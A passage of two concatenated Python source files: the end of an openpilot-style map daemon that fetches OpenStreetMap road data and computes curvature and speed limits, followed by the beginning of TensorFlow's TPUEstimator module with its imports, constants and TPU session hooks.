name = t['name'], "ISO3166-1:alpha2" = t['ISO3166-1:alpha2'];out;
"""
return q
def query_thread():
global last_query_result, last_query_pos, cache_valid
api = overpy.Overpass(url=OVERPASS_API_URL, headers=OVERPASS_HEADERS, timeout=10.)
while True:
time.sleep(1)
if last_gps is not None:
fix_ok = last_gps.flags & 1
if not fix_ok:
continue
if last_query_pos is not None:
cur_ecef = geodetic2ecef((last_gps.latitude, last_gps.longitude, last_gps.altitude))
prev_ecef = geodetic2ecef((last_query_pos.latitude, last_query_pos.longitude, last_query_pos.altitude))
dist = np.linalg.norm(cur_ecef - prev_ecef)
if dist < 3000: #updated when we are 1km from the edge of the downloaded circle
continue
if dist > 4000:
cache_valid = False
q = build_way_query(last_gps.latitude, last_gps.longitude, radius=4000)
try:
new_result = api.query(q)
# Build kd-tree
nodes = []
real_nodes = []
node_to_way = defaultdict(list)
location_info = {}
for n in new_result.nodes:
nodes.append((float(n.lat), float(n.lon), 0))
real_nodes.append(n)
for way in new_result.ways:
for n in way.nodes:
node_to_way[n.id].append(way)
for area in new_result.areas:
if area.tags.get('admin_level', '') == "2":
location_info['country'] = area.tags.get('ISO3166-1:alpha2', '')
if area.tags.get('admin_level', '') == "4":
location_info['region'] = area.tags.get('name', '')
nodes = np.asarray(nodes)
nodes = geodetic2ecef(nodes)
tree = spatial.cKDTree(nodes)
query_lock.acquire()
last_query_result = new_result, tree, real_nodes, node_to_way, location_info
last_query_pos = last_gps
cache_valid = True
query_lock.release()
except Exception as e:
print(e)
query_lock.acquire()
last_query_result = None
query_lock.release()
def save_gps_data(gps):
try:
location = [gps.speed, gps.bearing, gps.latitude, gps.longitude, gps.altitude, gps.accuracy, time.time()]
with open("/data/openpilot/selfdrive/data_collection/gps-data", "a") as f:
f.write("{}\n".format(location))
except:
pass
def mapsd_thread():
global last_gps
context = zmq.Context()
poller = zmq.Poller()
gps_sock = messaging.sub_sock(context, service_list['gpsLocation'].port, conflate=True)
gps_external_sock = messaging.sub_sock(context, service_list['gpsLocationExternal'].port, conflate=True, poller=poller)
map_data_sock = messaging.pub_sock(context, service_list['liveMapData'].port)
traffic_data_sock = messaging.sub_sock(context, service_list['liveTrafficData'].port, conflate=True, poller=poller)
cur_way = None
curvature_valid = False
curvature = None
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
speedLimittraffic = 0
speedLimittraffic_prev = 0
max_speed = None
max_speed_ahead = None
max_speed_ahead_dist = None
max_speed_prev = 0
speedLimittrafficvalid = False
while True:
gps = messaging.recv_one(gps_sock)
gps_ext = None
traffic = None
for socket, event in poller.poll(0):
if socket is gps_external_sock:
gps_ext = messaging.recv_one(socket)
elif socket is traffic_data_sock:
traffic = messaging.recv_one(socket)
if traffic is not None:
if traffic.liveTrafficData.speedLimitValid:
speedLimittraffic = traffic.liveTrafficData.speedLimit
if abs(speedLimittraffic_prev - speedLimittraffic) > 0.1:
speedLimittrafficvalid = True
speedLimittraffic_prev = speedLimittraffic
if traffic.liveTrafficData.speedAdvisoryValid:
speedLimittrafficAdvisory = traffic.liveTrafficData.speedAdvisory
speedLimittrafficAdvisoryvalid = True
else:
speedLimittrafficAdvisoryvalid = False
else:
speedLimittrafficAdvisoryvalid = False
speedLimittrafficvalid = False
if gps_ext is not None:
gps = gps_ext.gpsLocationExternal
else:
gps = gps.gpsLocation
save_gps_data(gps)
last_gps = gps
fix_ok = gps.flags & 1
if not fix_ok or last_query_result is None or not cache_valid:
cur_way = None
curvature = None
max_speed_ahead = None
max_speed_ahead_dist = None
curvature_valid = False
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
map_valid = False
else:
map_valid = True
lat = gps.latitude
lon = gps.longitude
heading = gps.bearing
speed = gps.speed
query_lock.acquire()
cur_way = Way.closest(last_query_result, lat, lon, heading, cur_way)
if cur_way is not None:
pnts, curvature_valid = cur_way.get_lookahead(lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
xs = pnts[:, 0]
ys = pnts[:, 1]
road_points = [float(x) for x in xs], [float(y) for y in ys]
if speed < 10:
curvature_valid = False
if curvature_valid and pnts.shape[0] <= 3:
curvature_valid = False
# The curvature is valid when at least MAPS_LOOKAHEAD_DISTANCE of road is found
if curvature_valid:
# Compute the curvature for each point
with np.errstate(divide='ignore'):
circles = [circle_through_points(*p) for p in zip(pnts, pnts[1:], pnts[2:])]
circles = np.asarray(circles)
radii = np.nan_to_num(circles[:, 2])
radii[radii < 10] = np.inf
curvature = 1. / radii
# Index of closest point
closest = np.argmin(np.linalg.norm(pnts, axis=1))
dist_to_closest = pnts[closest, 0] # We can use x distance here since it should be close
# Compute distance along path
dists = list()
dists.append(0)
for p, p_prev in zip(pnts, pnts[1:, :]):
dists.append(dists[-1] + np.linalg.norm(p - p_prev))
dists = np.asarray(dists)
dists = dists - dists[closest] + dist_to_closest
dists = dists[1:-1]
close_idx = np.logical_and(dists > 0, dists < 500)
dists = dists[close_idx]
curvature = curvature[close_idx]
if len(curvature):
# TODO: Determine left or right turn
curvature = np.nan_to_num(curvature)
# Outlier rejection
new_curvature = np.percentile(curvature, 90, interpolation='lower')
k = 0.6
upcoming_curvature = k * upcoming_curvature + (1 - k) * new_curvature
in_turn_indices = curvature > 0.8 * new_curvature
if np.any(in_turn_indices):
dist_to_turn = np.min(dists[in_turn_indices])
else:
dist_to_turn = 999
else:
upcoming_curvature = 0.
dist_to_turn = 999
query_lock.release()
dat = messaging.new_message()
dat.init('liveMapData')
if last_gps is not None:
dat.liveMapData.lastGps = last_gps
if cur_way is not None:
dat.liveMapData.wayId = cur_way.id
# Speed limit
max_speed = cur_way.max_speed()
if max_speed is not None:
#new_latitude = gps.latitude + (MAPS_LOOKAHEAD_DISTANCE * cos(heading/180*3.14159265358979) / (6371010 + gps.altitude)) * (180 / 3.14159265358979)
#new_longitude = gps.longitude + (MAPS_LOOKAHEAD_DISTANCE * sin(heading/180*3.14159265358979) / (6371010 + gps.altitude)) * (180 / 3.14159265358979) / cos(gps.latitude * 3.14159265358979/180)
ahead_speed = None
max_speed_ahead = None
max_speed_ahead_dist = None
#ahead_speed = Way.closest(last_query_result, new_latitude, new_longitude, heading, ahead_speed)
#if ahead_speed is not None and ahead_speed < max_speed:
# max_speed_ahead = ahead_speed.max_speed()
# print "speed ahead found"
# print max_speed_ahead
# max_speed_ahead_dist = cur_way.distance_to_closest_node(lat, lon, heading, pnts)
# print "distance"
# print max_speed_ahead_dist
if abs(max_speed - max_speed_prev) > 0.1:
speedLimittrafficvalid = False
max_speed_prev = max_speed
# TODO: use the function below to anticipate upcoming speed limits
max_speed_ahead, max_speed_ahead_dist = cur_way.max_speed_ahead(max_speed, lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
if max_speed_ahead is not None and max_speed_ahead_dist is not None:
dat.liveMapData.speedLimitAheadValid = True
dat.liveMapData.speedLimitAhead = float(max_speed_ahead)
dat.liveMapData.speedLimitAheadDistance = float(max_speed_ahead_dist)
advisory_max_speed = cur_way.advisory_max_speed()
if speedLimittrafficAdvisoryvalid:
dat.liveMapData.speedAdvisoryValid = True
dat.liveMapData.speedAdvisory = speedLimittrafficAdvisory / 3.6
else:
if advisory_max_speed is not None:
dat.liveMapData.speedAdvisoryValid = True
dat.liveMapData.speedAdvisory = advisory_max_speed
# Curvature
dat.liveMapData.curvatureValid = curvature_valid
dat.liveMapData.curvature = float(upcoming_curvature)
dat.liveMapData.distToTurn = float(dist_to_turn)
if road_points is not None:
dat.liveMapData.roadX, dat.liveMapData.roadY = road_points
if curvature is not None:
dat.liveMapData.roadCurvatureX = [float(x) for x in dists]
dat.liveMapData.roadCurvature = [float(x) for x in curvature]
if speedLimittrafficvalid:
if speedLimittraffic > 0.1:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = speedLimittraffic / 3.6
map_valid = False
else:
speedLimittrafficvalid = False
else:
if max_speed is not None:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = max_speed
#print "speedLimittraffic_prev"
#print speedLimittraffic_prev
#print "speedLimittraffic"
#print speedLimittraffic
#print "max_speed_prev"
#print max_speed_prev
#print "max_speed"
#print max_speed
#print "speedLimittrafficvalid"
#if speedLimittrafficvalid:
# print "True"
#else:
# print "False"
dat.liveMapData.mapValid = map_valid
map_data_sock.send(dat.to_bytes())
def main(gctx=None):
params = Params()
dongle_id = params.get("DongleId")
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
crash.install()
main_thread = threading.Thread(target=mapsd_thread)
main_thread.daemon = True
main_thread.start()
q_thread = threading.Thread(target=query_thread)
q_thread.daemon = True
q_thread.start()
while True:
time.sleep(0.1)
if __name__ == "__main__":
main()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE = 1
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP = 5
_TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY = '_concatenated_small_features'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
if ops.get_to_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Please use tf.contrib.summary instead of tf.summary '
'inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather then a constant, is to allow
TPUEstimator adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(ops.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None,
outfeed_every_n_steps=1):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._tpu_compile_op = tpu_compile_op
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on TPU directly. Reinitialize tpu
# is causing the variable corruption since the previous allocated memory
# might be overwritten for other purpose.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
self._outfeed_every_n_steps = outfeed_every_n_steps
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
step_counter = 0
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
if step_counter % self._outfeed_every_n_steps == 0:
session.run(self._dequeue_ops)
step_counter += 1
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of [`value',`unit`] that
represents the number of 'iterations count' or 'time in seconds' to run
optimizer per loop, based on the `unit` specified, `count` or `seconds`
respectively.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
